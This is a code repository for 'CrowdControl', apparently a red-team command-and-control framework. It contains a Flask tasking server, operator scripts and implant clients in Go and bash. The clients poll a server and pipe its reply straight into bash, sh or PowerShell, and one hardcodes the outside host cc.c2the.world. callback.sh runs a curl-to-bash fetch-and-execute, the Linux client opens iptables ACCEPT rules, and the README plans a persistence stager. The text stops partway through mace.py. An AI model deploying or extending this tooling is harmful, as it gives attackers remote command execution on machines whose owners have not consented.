├── README.md
├── client
    ├── callback.sh
    └── snare
    │   ├── nix
    │       ├── nix
    │       ├── nix_snare
    │       └── nix_snare.go
    │   ├── pf
    │       ├── pf
    │       └── pf_snare.go
    │   └── windows
    │       ├── win_cc.exe
    │       ├── win_snare.exe
    │       └── win_snare.go
├── commander
    ├── commander.py
    ├── groups
    │   ├── db.group
    │   ├── gitlab.group
    │   ├── group_generator.py
    │   ├── linuxA.group
    │   ├── linuxB.group
    │   ├── linuxC.group
    │   ├── team1.group
    │   ├── team10.group
    │   ├── team11.group
    │   ├── team12.group
    │   ├── team13.group
    │   ├── team14.group
    │   ├── team15.group
    │   ├── team2.group
    │   ├── team3.group
    │   ├── team4.group
    │   ├── team5.group
    │   ├── team6.group
    │   ├── team7.group
    │   ├── team8.group
    │   ├── team9.group
    │   └── web.group
    ├── mace.py
    └── requirements.txt
└── server
    ├── Dockerfile
    ├── app.py
    └── requirements.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # CrowdControl
 2 | This project is a C2 that utilizes web requests to deliver commands.  This repo contains the server/client/controller.  The server is a docker container which runs a flask app, the controller is a python script which allows users to push commands to the server, and the client(s) are a series of golang programs and bash scripts that will invoke the proper web request to pull commands, then execute them.  
 3 | 
 4 | ## Server
 5 | The server is a docker container that's running alpine linux with flask.  All the server functions/endpoints can be found in the `app.py` file.  
 6 | 
 7 | #### Endpoints
 8 | The server has the following endpoints:
 9 |  - `'/<ip>/<typ>' or '/api/callback/<ip>/<typ>'` - these are the endpoints the clients will hit in order to receive their commands.  The former is preferred, as the latter will soon be phased out.  The "\<ip>" is the ip of the client that's calling back, and the "\<type>" denotes where the callback is coming from (bash script, golang binary, vimrc) which is used for logging purposes.
10 |   - `'/api/commander/push'` - this is the endpoint that the commander script/CLI will send commands to.  It accepts a JSON POST that contains the target hosts and commands to be executed.
11 |   - `'/api/commander/calls'` - this is an endpoint that serves a log.  It's returns the log that tracks all client callbacks.  Any time a client hits one of the callback endpoints, an entry is made containing "Time | IP | Type", this endpoint returns all entires
12 |   - `'/api/commander/tasks'` - this is the other endpoint that serves a log.  Any time a command is pushed to the server, an entry is added to the task log containing "Time | Targets | Tasks", this endpoint returns all entires.  
13 | 
14 | ## Controller
15 | There are two methods to send commands to the server.  The original method, `commander.py` is a CLI with the ability to view tracked hosts, set multiple targets, and set commands.  This method is being phased out in favor of `mace.py`.  The `mace` script is not a CLI, but rather all input is given through arguments, to allow for faster/easier control.  The following are options when executing the mace script:  
16 | ```
17 | FUNCTION:                ARGUMENTS TO PASS TO MACE.PY:
18 | New task:                t: host[ hosts...]: commands 
19 | New task script:         ts: host[ hosts...]: \<script file>  
20 | Show recent hosts:       s: recent
21 | Show callbacks log:      s: calls
22 | Show tasks log:          s: tasks
23 | Example:                 t: 1.1.1.1 2.2.2.2 host3: echo hi" 
24 | ```  
25 | 'New task' will run the given commands on the specified hosts.  'New task script' will execute the given script on the specified hosts.  'Show recent hosts' will list all hosts that have called back in the last 10 minutes, and the 'show log' options will display the specified log to the user.  
26 | 
27 | 'New task' and 'New task script' both support "groups." You can define a group by creating a file with the following format:  
28 | ```
29 | 8.8.8.8
30 | 1.2.3.4
31 | 10.100.6.9
32 | ```
33 | The file must be in exactly the format shown above, with each IP on it's own line and no other data in the file.  Once you have the group created, for example lets say we have the `web` group file, we can execute commands like this:  
34 | `t: web: echo hi`  
35 | or like this:  
36 | `ts: web: script.sh`  
37 | This will execute the given command or script on every IP listed in the group file.  Group files don't need to be in any specific place, but it's recommended to put them in their own "groups" directory inside the commander directory for easy reading.
38 | 
39 | ## Clients
40 | There is currently only support for Linux clients, although Windows endpoints have been created, so it's a WIP.  The client script can be anything from a golang binary, a python or bash script, etc, as long as it can invoke a web request.  The format is very simple, simply send a GET request to `serverIP/<ip>/<type>` and the return will be the commands that need to be executed.  
41 | 
42 |  ## Install and Configuration
43 |  #### Server
44 | The docker image can be built from the "server" directory by using the following command:  
45 | `sudo docker build -t cc:latest .`  
46 | once the build is finished, it can be run with the following:  
47 | `sudo docker run -d -p 5000:5000 cc`  
48 | The flask server is now accessible via port 5000  
49 | #### Commander
50 | In the `commander.py` file, the server variable needs to be set to the ip of the flask server.
51 | 
52 | ## Future Work:
53 |  - Windows endpoints have been created, we need to write some clients that will use cmd and/or PowerShell (preferably PowerShell).
54 |  
55 |  - Write a stager script that will pull a client script/binary/whatever, set it up as a scheduled task/service/whatever.  Once this stager script is hosted on the server (must make a new stager endpoint), hosts can be added to the control infrastucture by simply invoking a web request and piping the script into bash/PowerShell.
56 | 


--------------------------------------------------------------------------------
/client/callback.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Get the python version 
 4 | if [ "`command -v python`" != "" ]; 
 5 | then 
 6 | py=python 
 7 | elif [ "`command -v python3`" != "" ]; 
 8 | then 
 9 | py=python3 
10 | fi 
11 | # Get the external IP address 
12 | if [ "$py" != "" ]; 
13 | then 
14 | IP=`$py -c 'import socket; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect(("8.8.8.8", 80)); print(s.getsockname()[0]); s.close()'`
15 | fi
16 | 
17 | # curl the address
18 | curl //server:80/$IP/bash | /bin/bash


--------------------------------------------------------------------------------
/client/snare/nix/nix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/degenerat3/CrowdControl/05f15ea7e8d669a5af5191464cde03d65da8886e/client/snare/nix/nix


--------------------------------------------------------------------------------
/client/snare/nix/nix_snare:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/degenerat3/CrowdControl/05f15ea7e8d669a5af5191464cde03d65da8886e/client/snare/nix/nix_snare


--------------------------------------------------------------------------------
/client/snare/nix/nix_snare.go:
--------------------------------------------------------------------------------
  1 | // Golang bot to pull commands from webserver and execute them
  2 | // Disclaimer: This barely works
  3 | // @author: degenerat3
  4 | 
  5 | package main
  6 | 
  7 | import (
  8 | 	"io"
  9 | 	"io/ioutil"
 10 | 	"net"
 11 | 	"net/http"
 12 | 	"os"
 13 | 	"os/exec"
 14 | 	"time"
 15 | )
 16 | 
 17 | var serv = getServer() //IP of flask serv
 18 | var src = "snare"      // where is this calling back from
 19 | var loopTime = 60      //sleep time in secs
 20 | 
 21 | func getServer() string {
 22 | 	//envVar := os.Getenv("SYS_OUTPUT") //fetch environment variable
 23 | 	//trimmedStr := strings.Replace(envVar, "/etc/systemlogs/gaspell-", "", 1)
 24 | 	//decoded, _ := b64.StdEncoding.DecodeString(trimmedStr)
 25 | 
 26 | 	/**
 27 | 	servs := make([]string, 0)
 28 | 	servs = append(servs,
 29 | 		"192.168.5.130",
 30 | 		"192.168.5.146",
 31 | 		"192.168.5.169",
 32 | 		"192.168.5.171",
 33 | 		"192.168.5.204",
 34 | 		"192.168.5.21",
 35 | 		"192.168.5.215",
 36 | 		"192.168.5.218",
 37 | 		"192.168.5.223",
 38 | 		"192.168.5.250",
 39 | 		"192.168.5.76",
 40 | 		"192.168.6.137",
 41 | 		"192.168.6.200",
 42 | 		"192.168.6.202",
 43 | 		"192.168.6.204",
 44 | 		"192.168.6.44",
 45 | 		"192.168.6.51",
 46 | 		"192.168.6.63",
 47 | 		"192.168.6.76",
 48 | 		"192.168.6.95",
 49 | 	)
 50 | 	selection := servs[rand.Intn(len(servs))]
 51 | 	return string(selection)
 52 | 	*/
 53 | 	return "cc.c2the.world"
 54 | }
 55 | 
 56 | func getIP() string {
 57 | 	conn, _ := net.Dial("udp", "8.8.8.8:80")
 58 | 	defer conn.Close()
 59 | 	ad := conn.LocalAddr().(*net.UDPAddr)
 60 | 	ipStr := ad.IP.String()
 61 | 	return ipStr
 62 | }
 63 | 
 64 | func pokeHole() {
 65 | 	exec.Command("/bin/bash", "-c", "/usr/bin/ipt-manager iptables -I INPUT 1 -j ACCEPT").Run()
 66 | 	exec.Command("/bin/bash", "-c", "/usr/bin/ipt-manager iptables -I OUTPUT 1 -j ACCEPT").Run()
 67 | 	getCommands()
 68 | 	exec.Command("/bin/bash", "-c", "/usr/bin/ipt-manager iptables -D INPUT 1").Run()
 69 | 	exec.Command("/bin/bash", "-c", "/usr/bin/ipt-manager iptables -D OUTPUT 1").Run()
 70 | }
 71 | 
 72 | func getCommands() {
 73 | 	ip := getIP()
 74 | 	url := "http://" + serv + "/" + ip + "/" + src
 75 | 	r, err := http.Get(url)
 76 | 	if err != nil {
 77 | 		return
 78 | 	}
 79 | 	defer r.Body.Close()
 80 | 	txt, err := ioutil.ReadAll(r.Body)
 81 | 	txt = []byte("sleep 1")
 82 | 	if err != nil {
 83 | 		return
 84 | 	}
 85 | 	//exec.Command(string(txt))
 86 | 	bsh := exec.Command("/bin/bash")
 87 | 	stdin, _ := bsh.StdinPipe()
 88 | 	go func() {
 89 | 		defer stdin.Close()
 90 | 		io.WriteString(stdin, string(txt))
 91 | 	}()
 92 | 	bsh.Run()
 93 | }
 94 | 
 95 | func main() {
 96 | 	argslen := len(os.Args)
 97 | 	if argslen < 2 {
 98 | 		for {
 99 | 
100 | 			getCommands()
101 | 			time.Sleep(time.Duration(loopTime) * time.Second)
102 | 		}
103 | 	} else {
104 | 		if os.Args[1] == "-f" {
105 | 			pokeHole()
106 | 		} else {
107 | 			getCommands()
108 | 		}
109 | 	}
110 | 
111 | }
112 | 


--------------------------------------------------------------------------------
/client/snare/pf/pf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/degenerat3/CrowdControl/05f15ea7e8d669a5af5191464cde03d65da8886e/client/snare/pf/pf


--------------------------------------------------------------------------------
/client/snare/pf/pf_snare.go:
--------------------------------------------------------------------------------
 1 | // Golang bot to pull commands from webserver and execute them
 2 | // Disclaimer: This barely works
 3 | // @author: degenerat3
 4 | 
 5 | package main
 6 | 
 7 | import (
 8 | 	"fmt"
 9 | 	"io"
10 | 	"io/ioutil"
11 | 	"math/rand"
12 | 	"net"
13 | 	"net/http"
14 | 	"os/exec"
15 | 	"strings"
16 | 	"time"
17 | )
18 | 
19 | var src = "Snare" // where is this calling back from
20 | var loopTime = 60 //sleep time in secs
21 | 
22 | func getServer() string {
23 | 	//envVar := os.Getenv("DEBUGGER_LOGGING") //fetch environment variable
24 | 	//trimmedStr := strings.Replace(envVar, "/var/log/system-", "", 1)
25 | 	//decoded, _ := b64.StdEncoding.DecodeString(trimmedStr)
26 | 	//return string(decoded)
27 | 	servs := make([]string, 0)
28 | 	servs = append(servs,
29 | 		"1.2.3.4",
30 | 	)
31 | 	selection := servs[rand.Intn(len(servs))]
32 | 	return string(selection)
33 | }
34 | 
35 | func getIP() string {
36 | 	t, _ := net.InterfaceAddrs()
37 | 	for _, ip := range t {
38 | 		if strings.Contains(ip.String(), ".2.1") {
39 | 			fmt.Println(ip.String())
40 | 			i := ip.String()
41 | 			real_i := strings.Split(i, "/")[0]
42 | 			return real_i
43 | 		}
44 | 	}
45 | 	return "unknown-pfsense"
46 | }
47 | 
48 | func getCommands() {
49 | 	ip := getIP()
50 | 	serv := getServer()
51 | 	url := "http://" + serv + "/" + ip + "/" + src
52 | 	r, err := http.Get(url)
53 | 	if err != nil {
54 | 		return
55 | 	}
56 | 	defer r.Body.Close()
57 | 	txt, err := ioutil.ReadAll(r.Body)
58 | 	if err != nil {
59 | 		return
60 | 	}
61 | 	//exec.Command(string(txt))
62 | 	bsh := exec.Command("/bin/sh")
63 | 	stdin, _ := bsh.StdinPipe()
64 | 	go func() {
65 | 		defer stdin.Close()
66 | 		io.WriteString(stdin, string(txt))
67 | 	}()
68 | 	bsh.Run()
69 | }
70 | 
71 | func main() {
72 | 	for {
73 | 
74 | 		getCommands()
75 | 		time.Sleep(time.Duration(loopTime) * time.Second)
76 | 	}
77 | 
78 | }
79 | 


--------------------------------------------------------------------------------
/client/snare/windows/win_cc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/degenerat3/CrowdControl/05f15ea7e8d669a5af5191464cde03d65da8886e/client/snare/windows/win_cc.exe


--------------------------------------------------------------------------------
/client/snare/windows/win_snare.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/degenerat3/CrowdControl/05f15ea7e8d669a5af5191464cde03d65da8886e/client/snare/windows/win_snare.exe


--------------------------------------------------------------------------------
/client/snare/windows/win_snare.go:
--------------------------------------------------------------------------------
 1 | // Golang bot to pull commands from webserver and execute them
 2 | // Disclaimer: This barely works
 3 | // @author: degenerat3
 4 | 
 5 | package main
 6 | 
 7 | import (
 8 | 	"fmt"
 9 | 	"io"
10 | 	"io/ioutil"
11 | 	"math/rand"
12 | 	"net"
13 | 	"net/http"
14 | 	"os/exec"
15 | 	"time"
16 | )
17 | 
18 | var serv = getServer() //IP of flask serv
19 | var src = "Snare"      // where is this calling back from
20 | var loopTime = 120     //sleep time in secs
21 | 
22 | func getServer() string {
23 | 	//envVar := os.Getenv("SYS_OUTPUT") //fetch environment variable
24 | 	//trimmedStr := strings.Replace(envVar, "/etc/systemlogs/gaspell-", "", 1)
25 | 	//decoded, _ := b64.StdEncoding.DecodeString(trimmedStr)
26 | 	servs := make([]string, 0)
27 | 	servs = append(servs,
28 | 		"192.168.5.130",
29 | 		"192.168.5.146",
30 | 		"192.168.5.169",
31 | 		"192.168.5.171",
32 | 		"192.168.5.204",
33 | 		"192.168.5.21",
34 | 		"192.168.5.215",
35 | 		"192.168.5.218",
36 | 		"192.168.5.223",
37 | 		"192.168.5.250",
38 | 		"192.168.5.76",
39 | 		"192.168.6.137",
40 | 		"192.168.6.200",
41 | 		"192.168.6.202",
42 | 		"192.168.6.204",
43 | 		"192.168.6.44",
44 | 		"192.168.6.51",
45 | 		"192.168.6.63",
46 | 		"192.168.6.76",
47 | 		"192.168.6.95",
48 | 	)
49 | 	selection := servs[rand.Intn(len(servs))]
50 | 	return string(selection)
51 | }
52 | 
53 | func getIP() string {
54 | 	conn, _ := net.Dial("udp", "8.8.8.8:80")
55 | 	defer conn.Close()
56 | 	ad := conn.LocalAddr().(*net.UDPAddr)
57 | 	ipStr := ad.IP.String()
58 | 	return ipStr
59 | }
60 | 
61 | func getCommands() {
62 | 	ip := getIP()
63 | 	url := "http://" + serv + "/" + ip + "/" + src
64 | 	r, err := http.Get(url)
65 | 	if err != nil {
66 | 		return
67 | 	}
68 | 	defer r.Body.Close()
69 | 	txt, err := ioutil.ReadAll(r.Body)
70 | 	if err != nil {
71 | 		return
72 | 	}
73 | 	fmt.Printf(string(txt))
74 | 	//exec.Command(string(txt))
75 | 	bsh := exec.Command("powershell.exe")
76 | 	stdin, _ := bsh.StdinPipe()
77 | 	go func() {
78 | 		defer stdin.Close()
79 | 		io.WriteString(stdin, string(txt))
80 | 	}()
81 | 	bsh.Run()
82 | }
83 | 
84 | func main() {
85 | 	for {
86 | 		getCommands()
87 | 		time.Sleep(time.Duration(loopTime) * time.Second)
88 | 	}
89 | 
90 | }
91 | 


--------------------------------------------------------------------------------
/commander/commander.py:
--------------------------------------------------------------------------------
  1 | """
  2 | This script will function as a CLI to push commands/targets to the web server
  3 | @author: degenerat3
  4 | """
  5 | 
  6 | import requests 
  7 | import re
  8 | 
  9 | server = "http://127.0.0.1:80"
 10 | 
 11 | 
 12 | def welcome_msg():
 13 |     print("Welcome to Crowd Control Commander")
 14 |     print("Current server: " + server)
 15 |     print()
 16 |     print("Type 'help' for CLI options...")
 17 | 
 18 | def help_msg():
 19 |     print("Current server: " + server)
 20 |     print("To create new task:  `new task`")
 21 |     print("New task shortcut:   `t: host[ hosts...]: commands`")
 22 |     print("Set server IP:       `set server http://0.0.0.0:5000")
 23 |     print("To view hosts:       `show hosts`")
 24 |     print("To quit:             `exit`")
 25 | 
 26 | 
 27 | def parse_hosts(inp):
 28 |     arr = re.search('\[(.*)\]', inp).group(0)[1:-1]
 29 |     hosts = arr.split(",")
 30 |     return hosts
 31 | 
 32 | 
 33 | def parse_commands(inp):
 34 |     return re.search('"(.*)"', inp).group(0)[1:-1]
 35 | 
 36 | 
 37 | def task_help():
 38 |     print("To view hosts:       `show hosts`")
 39 |     print("To view task info:   `show task`")
 40 |     print("To add hosts:        `set host = [8.8.8.8]`")
 41 |     print("To add commands:     `set command = \"whoami\"`")
 42 |     print("To launch the task:  `launch`")
 43 |     print("To quit:             `exit`")
 44 |     return
 45 | 
 46 | 
 47 | def send_it(hosts, commands, srv):
 48 |     print("launching: " + commands)
 49 |     print("to: " + str(hosts))
 50 |     u = srv + "/api/commander/push" 
 51 |     hs = ""
 52 | 
 53 |     for h in hosts:
 54 |         hs += h + "|"
 55 |     hs = hs[:-1]
 56 |     jdata = {"hosts": hs, "commands": commands}
 57 |     r = requests.post(u, json=jdata)
 58 |     return
 59 | 
 60 | def new_task_loop(srv):
 61 |     hosts = ""
 62 |     commands = ""
 63 |     while True:
 64 |         inp = input('Commander(TASK)> ')
 65 |         if "set" in inp:
 66 |             if "host" in inp:
 67 |                 hosts = parse_hosts(inp)
 68 |             elif "commands" in inp:
 69 |                 commands = parse_commands(inp)
 70 |         elif "show" in inp:
 71 |             if inp == "show hosts":
 72 |                 url = srv + "/api/commander/show"
 73 |                 r = requests.get(url=url)
 74 |                 block = r.text
 75 |                 print("Tracked hosts:")
 76 |                 print(block)
 77 |                 print()
 78 |             elif "task" in inp or "TASK" in inp:
 79 |                 print("TASK INFO: ")
 80 |                 print("Host(s): " + str(hosts))
 81 |                 print("Command(s): " + commands)
 82 |             else:
 83 |                 print("Unknown command: " + inp)
 84 |         elif inp == "help":
 85 |             task_help()
 86 |         elif inp == "launch":
 87 |             if hosts == "":
 88 |                 print("target hosts undefined...")
 89 |             elif commands == "":
 90 |                 print("target commands undefined...")
 91 |             else:
 92 |                 send_it(hosts, commands, srv)
 93 |                 return
 94 |         elif inp == "exit":
 95 |             return
 96 |         else:
 97 |             print("Unknown command: " + inp)
 98 | 
 99 | 
100 | def new_task(inp):
101 |     # t: 8.8.8.8 8.8.8.8 8.8.8.8: echo hi
102 |     try:
103 |         _, ips, command = inp.split(":", 2)
104 |         hosts = ips.replace(",","").strip().split()
105 |         command = command.strip()
106 |         print("Host(s): " + str(hosts))
107 |         print("Command: " + command)
108 |         send_it(hosts, command, server)
109 |     except Exception as E:
110 |         print(E)
111 |         print("Error in format: 't: host[ hosts...]: commands'")
112 | 
113 | def big_loop(srv):
114 |     while True:
115 |         inp = input('Commander> ')
116 |         if inp == "help":
117 |             help_msg()
118 |         if "show" in inp:
119 |             url = srv + "/api/commander/show"
120 |             r = requests.get(url=url)
121 |             block = r.text
122 |             if inp == "show hosts":
123 |                 print("Tracked hosts:")
124 |                 print(block)
125 |                 print()
126 |             else:
127 |                 print("Unknown Command: " + inp)
128 |         elif inp == "new task":
129 |             new_task_loop(srv)
130 |         elif inp[0:2] == "t:" and len(inp.split()) > 3:
131 |             # We are doing a single line new task
132 |             new_task(inp)
133 |         elif inp.startswith("set server "):
134 |             try:
135 |                 _, _, srv = inp.split()[2]
136 |                 global server
137 |                 server = srv
138 |             except:
139 |                 pass
140 |         elif inp == "exit":
141 |             return
142 |         else:
143 |             print("Unknown command: " + inp)
144 | 
145 | 
146 | def run():
147 |     welcome_msg()
148 |     s = server   
149 |     big_loop(s)
150 | 
151 | run()


--------------------------------------------------------------------------------
/commander/groups/db.group:
--------------------------------------------------------------------------------
 1 | 10.1.2.3
 2 | 10.2.2.3
 3 | 10.3.2.3
 4 | 10.4.2.3
 5 | 10.5.2.3
 6 | 10.6.2.3
 7 | 10.7.2.3
 8 | 10.8.2.3
 9 | 10.9.2.3
10 | 10.10.2.3
11 | 10.11.2.3
12 | 10.12.2.3
13 | 10.13.2.3
14 | 10.14.2.3
15 | 10.15.2.3
16 | 


--------------------------------------------------------------------------------
/commander/groups/gitlab.group:
--------------------------------------------------------------------------------
 1 | 10.1.2.5
 2 | 10.2.2.5
 3 | 10.3.2.5
 4 | 10.4.2.5
 5 | 10.5.2.5
 6 | 10.6.2.5
 7 | 10.7.2.5
 8 | 10.8.2.5
 9 | 10.9.2.5
10 | 10.10.2.5
11 | 10.11.2.5
12 | 10.12.2.5
13 | 10.13.2.5
14 | 10.14.2.5
15 | 10.15.2.5
16 | 


--------------------------------------------------------------------------------
/commander/groups/group_generator.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # generate group files given IPs and team numbers
 3 | 
 4 | groupname = "linuxD"
 5 | hosts = ["10.X.1.40"]
 6 | teams = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
 7 | 
 8 | ips = []
 9 | 
10 | for host in hosts:
11 |     for t in teams:
12 |         new_ip = host.replace("X", str(t))
13 |         ips.append(new_ip)
14 | 
15 | outf = groupname + ".group"
16 | f= open(outf, 'w+')
17 | for i in ips:
18 |     wi = str(i) + "\n"
19 |     f.write(wi)
20 | f.close()
21 | 
22 | 


--------------------------------------------------------------------------------
/commander/groups/linuxA.group:
--------------------------------------------------------------------------------
 1 | 10.1.1.10
 2 | 10.2.1.10
 3 | 10.3.1.10
 4 | 10.4.1.10
 5 | 10.5.1.10
 6 | 10.6.1.10
 7 | 10.7.1.10
 8 | 10.8.1.10
 9 | 10.9.1.10
10 | 10.10.1.10
11 | 10.11.1.10
12 | 10.12.1.10
13 | 10.13.1.10
14 | 10.14.1.10
15 | 10.15.1.10
16 | 


--------------------------------------------------------------------------------
/commander/groups/linuxB.group:
--------------------------------------------------------------------------------
 1 | 10.1.1.20
 2 | 10.2.1.20
 3 | 10.3.1.20
 4 | 10.4.1.20
 5 | 10.5.1.20
 6 | 10.6.1.20
 7 | 10.7.1.20
 8 | 10.8.1.20
 9 | 10.9.1.20
10 | 10.10.1.20
11 | 10.11.1.20
12 | 10.12.1.20
13 | 10.13.1.20
14 | 10.14.1.20
15 | 10.15.1.20
16 | 


--------------------------------------------------------------------------------
/commander/groups/linuxC.group:
--------------------------------------------------------------------------------
 1 | 10.1.1.30
 2 | 10.2.1.30
 3 | 10.3.1.30
 4 | 10.4.1.30
 5 | 10.5.1.30
 6 | 10.6.1.30
 7 | 10.7.1.30
 8 | 10.8.1.30
 9 | 10.9.1.30
10 | 10.10.1.30
11 | 10.11.1.30
12 | 10.12.1.30
13 | 10.13.1.30
14 | 10.14.1.30
15 | 10.15.1.30
16 | 


--------------------------------------------------------------------------------
/commander/groups/team1.group:
--------------------------------------------------------------------------------
1 | 10.1.1.10
2 | 10.1.1.20
3 | 10.1.1.30
4 | 10.1.2.2
5 | 10.1.2.3
6 | 10.1.2.5
7 | 10.1.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team10.group:
--------------------------------------------------------------------------------
1 | 10.10.1.10
2 | 10.10.1.20
3 | 10.10.1.30
4 | 10.10.2.2
5 | 10.10.2.3
6 | 10.10.2.5
7 | 10.10.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team11.group:
--------------------------------------------------------------------------------
1 | 10.11.1.10
2 | 10.11.1.20
3 | 10.11.1.30
4 | 10.11.2.2
5 | 10.11.2.3
6 | 10.11.2.5
7 | 10.11.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team12.group:
--------------------------------------------------------------------------------
1 | 10.12.1.10
2 | 10.12.1.20
3 | 10.12.1.30
4 | 10.12.2.2
5 | 10.12.2.3
6 | 10.12.2.5
7 | 10.12.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team13.group:
--------------------------------------------------------------------------------
1 | 10.13.1.10
2 | 10.13.1.20
3 | 10.13.1.30
4 | 10.13.2.2
5 | 10.13.2.3
6 | 10.13.2.5
7 | 10.13.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team14.group:
--------------------------------------------------------------------------------
1 | 10.14.1.10
2 | 10.14.1.20
3 | 10.14.1.30
4 | 10.14.2.2
5 | 10.14.2.3
6 | 10.14.2.5
7 | 10.14.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team15.group:
--------------------------------------------------------------------------------
1 | 10.15.1.10
2 | 10.15.1.20
3 | 10.15.1.30
4 | 10.15.2.2
5 | 10.15.2.3
6 | 10.15.2.5
7 | 10.15.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team2.group:
--------------------------------------------------------------------------------
1 | 10.2.1.10
2 | 10.2.1.20
3 | 10.2.1.30
4 | 10.2.2.2
5 | 10.2.2.3
6 | 10.2.2.5
7 | 10.2.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team3.group:
--------------------------------------------------------------------------------
1 | 10.3.1.10
2 | 10.3.1.20
3 | 10.3.1.30
4 | 10.3.2.2
5 | 10.3.2.3
6 | 10.3.2.5
7 | 10.3.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team4.group:
--------------------------------------------------------------------------------
1 | 10.4.1.10
2 | 10.4.1.20
3 | 10.4.1.30
4 | 10.4.2.2
5 | 10.4.2.3
6 | 10.4.2.5
7 | 10.4.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team5.group:
--------------------------------------------------------------------------------
1 | 10.5.1.10
2 | 10.5.1.20
3 | 10.5.1.30
4 | 10.5.2.2
5 | 10.5.2.3
6 | 10.5.2.5
7 | 10.5.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team6.group:
--------------------------------------------------------------------------------
1 | 10.6.1.10
2 | 10.6.1.20
3 | 10.6.1.30
4 | 10.6.2.2
5 | 10.6.2.3
6 | 10.6.2.5
7 | 10.6.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team7.group:
--------------------------------------------------------------------------------
1 | 10.7.1.10
2 | 10.7.1.20
3 | 10.7.1.30
4 | 10.7.2.2
5 | 10.7.2.3
6 | 10.7.2.5
7 | 10.7.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team8.group:
--------------------------------------------------------------------------------
1 | 10.8.1.10
2 | 10.8.1.20
3 | 10.8.1.30
4 | 10.8.2.2
5 | 10.8.2.3
6 | 10.8.2.5
7 | 10.8.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/team9.group:
--------------------------------------------------------------------------------
1 | 10.9.1.10
2 | 10.9.1.20
3 | 10.9.1.30
4 | 10.9.2.2
5 | 10.9.2.3
6 | 10.9.2.5
7 | 10.9.1.40
8 | 


--------------------------------------------------------------------------------
/commander/groups/web.group:
--------------------------------------------------------------------------------
 1 | 10.1.2.2
 2 | 10.2.2.2
 3 | 10.3.2.2
 4 | 10.4.2.2
 5 | 10.5.2.2
 6 | 10.6.2.2
 7 | 10.7.2.2
 8 | 10.8.2.2
 9 | 10.9.2.2
10 | 10.10.2.2
11 | 10.11.2.2
12 | 10.12.2.2
13 | 10.13.2.2
14 | 10.14.2.2
15 | 10.15.2.2
16 | 


--------------------------------------------------------------------------------
/commander/mace.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | import sys
  3 | import os
  4 | import requests
  5 | import datetime
  6 | import json
  7 | 
  8 | 
  9 | def checkHostCount(count):
 10 |     if count >= 15:
 11 |         print("That group's pretty big, this seems like a dangerous action to run.")
 12 |         print("You should use a smaller group.")
 13 |         exit()
 14 |     return
 15 | 
 16 | def new_task(args):
 17 |     '''Create a new task and run it on the given hosts
 18 |     Args:
 19 |         args (str): the arguments that are passed into the program
 20 |             Example (single command):
 21 |                 t: 8.8.8.8 8.8.8.8 8.8.8.8: echo hi
 22 |             Example (script):
 23 |                 ts: 8.8.8.8 8.8.8.8 8.8.8.8: echo hi
 24 |     '''
 25 |     try:
 26 |         _, ips, command = args.split(":", 2)
 27 |         if os.path.isfile(ips.strip()):
 28 |             with open(ips.strip()) as ipf:
 29 |                 new = []
 30 |                 hs = ipf.readlines()
 31 |                 hostcount = 0
 32 |                 for h in hs:
 33 |                     h = h.rstrip()
 34 |                     new.append(h)
 35 |                     hostcount += 1
 36 |                 checkHostCount(hostcount)
 37 |                 hosts = new
 38 |         else:
 39 |             hosts = ips.replace(",","").strip().split()
 40 |         command = command.strip()
 41 |         if not hosts or not command:
 42 |             raise Exception("Invalid hosts or commands")
 43 |         print("Host(s): " + str(hosts))
 44 |         # If its a script, read the script and the command
 45 |         if args.startswith("ts:"):
 46 |             with open(command) as fil:
 47 |                 cmd = fil.read()
 48 |             print("Script: " + command)
 49 |         else:
 50 |             # just use the actual command
 51 |             cmd = command
 52 |             print("Command: " + command)
 53 | 
 54 |         header = {'Content-type': 'application/json'}
 55 |         data = {"hosts": "|".join(hosts), "commands": cmd}
 56 |         request = requests.post(server + "/api/commander/push", headers=header, data=json.dumps(data))
 57 |         if request.status_code != 200:
 58 |             print("{}:\n{}".format(request.status_code, request.content))
 59 |     except Exception as E:
 60 |         print(E)
 61 |         print("Usage: 't: host[ hosts...]: commands'")
 62 | 
 63 | def show_recent(minutes=10):
 64 |     '''Given the content of the callback log, parse the hosts and types of callbacks with in the past X minutes
 65 |     Args:
 66 |         minutes (int, default=10): the number of minutes to show
 67 |     Returns:
 68 |         dict: A dictionary of the hosts and callback types
 69 |             Example:
 70 |             {
 71 |                 '8.8.8.8': set('bash', 'go'),
 72 |                 '4.4.4.4': set('go', 'bashrc')
 73 |             }
 74 |     '''
 75 |     content = show_calls()
 76 |     data = {}
 77 |     for line in reversed(content.split("\n")):
 78 |         line = line.strip()
 79 |         # Skip empty lines
 80 |         if not line:
 81 |             continue
 82 |         # Get the data from the logfile
 83 |         date, time, ip, source = line.strip().split()
 84 |         # Find the time delta
 85 |         log_time = datetime.datetime.strptime(date +" "+time, '%Y-%m-%d %H:%M:%S')
 86 |         diff = datetime.datetime.now() - log_time
 87 |         # If the logs are older than the time difference, stop parsing
 88 |         if diff.seconds > 60*minutes:
 89 |             break
 90 |         # Add the IP to the data if its not there
 91 |         if ip not in data:
 92 |             data[ip] = set()
 93 |         # Add the new source to the data
 94 |         data[ip].add(source)
 95 |     return data
 96 | 
 97 | def show_calls():
